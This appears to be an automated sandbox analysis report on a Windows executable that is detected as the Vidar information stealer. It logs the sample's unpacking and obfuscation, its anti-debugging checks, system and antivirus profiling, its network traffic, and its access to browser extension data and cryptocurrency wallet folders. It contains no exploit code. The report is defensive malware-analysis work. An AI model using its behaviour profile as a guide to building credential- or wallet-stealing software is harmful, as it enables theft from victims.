Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Street	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Llanelli	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Carmarthenshire	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Wales	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Strigamia	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: crassipes	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: centipede	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: belonging	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: family	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Linotaeniidae	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: the	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: order	0_2_00410940
Source: C:\Users\user\Desktop\06625899.exe	Command line argument: Geophilomorpha	0_2_00410940

Source: C:\Users\user\Desktop\06625899.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 06625899.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 06625899.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 06625899.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 06625899.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 06625899.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 06625899.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 06625899.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe
Source:	Binary string: uDC:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\06625899.exe

Unpacked PE file: 0.2.06625899.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\06625899.exe

Unpacked PE file: 0.2.06625899.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042C254 pushad ; retn 0042h	0_2_0042C255
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00433795 push ecx; ret	0_2_004337A8
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042ECB5 push ecx; ret	0_2_0042ECC8

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\06625899.exe

0_2_00424430

Source: initial sample

Static PE information: section name: .text entropy: 7.818078308305934

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49685

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\06625899.exe

0_2_00424430

Is looking for software installed on the system

Source: C:\Users\user\Desktop\06625899.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\06625899.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_004011A0 GetSystemInfo,

0_2_004011A0

Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00424100 FindFirstFileW,_wcslen,FindNextFileW,_wcslen,FindNextFileW,	0_2_00424100
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00416500 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00416500
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_004118B0 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_004118B0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00416B10 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,	0_2_00416B10
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00411B90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00411B90
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0040BC20 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_strlen,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,	0_2_0040BC20
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00411DD0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00411DD0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0041AFF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose,	0_2_0041AFF0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0040B190 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlen,_memset,	0_2_0040B190
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_004162F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_004162F0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00416770 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose,	0_2_00416770
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00409F60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00409F60

Source: C:\Users\user\Desktop\06625899.exe

0_2_0040D1C0

Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Binary or memory string: Hyper-V RAW

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_0042A36A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0042A36A

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\06625899.exe

0_2_00424430

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_0041F170 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

0_2_0041F170

Source: C:\Users\user\Desktop\06625899.exe

Memory protected: page guard

Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0042A36A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0042A36A
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0043139E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0043139E
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00435F17 SetUnhandledExceptionFilter,	0_2_00435F17

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\06625899.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\06625899.exe	Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,	0_2_0041EE70
Source: C:\Users\user\Desktop\06625899.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_00438131
Source: C:\Users\user\Desktop\06625899.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_004381F1
Source: C:\Users\user\Desktop\06625899.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_00438258
Source: C:\Users\user\Desktop\06625899.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_00438294
Source: C:\Users\user\Desktop\06625899.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00437597
Source: C:\Users\user\Desktop\06625899.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	0_2_004366D3
Source: C:\Users\user\Desktop\06625899.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_0042E77A
Source: C:\Users\user\Desktop\06625899.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00437885
Source: C:\Users\user\Desktop\06625899.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_0043693B
Source: C:\Users\user\Desktop\06625899.exe	Code function: GetLocaleInfoA,	0_2_00430A1A
Source: C:\Users\user\Desktop\06625899.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_0043AB62
Source: C:\Users\user\Desktop\06625899.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_0043AC3C
Source: C:\Users\user\Desktop\06625899.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00437D69
Source: C:\Users\user\Desktop\06625899.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_00437E5E
Source: C:\Users\user\Desktop\06625899.exe	Code function: GetLocaleInfoA,wsprintfA,_memset,LocalFree,	0_2_0041EED8
Source: C:\Users\user\Desktop\06625899.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_00437F60
Source: C:\Users\user\Desktop\06625899.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_00437F05

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_00401090 cpuid

0_2_00401090

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\06625899.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_00420120 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,

0_2_00420120

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_00420120 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,

0_2_00420120

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_0041EDD0 GetUserNameA,

0_2_0041EDD0

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\06625899.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

AV process strings found (often used to terminate AV products)

Source: 06625899.exe, 00000000.00000002.413121737.00000000031BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Windows Defender\MsMpeng.exe
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.06625899.exe.2320e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.06625899.exe.2320e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.06625899.exe.2380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.06625899.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.06625899.exe.2380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.06625899.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\?	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\?	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
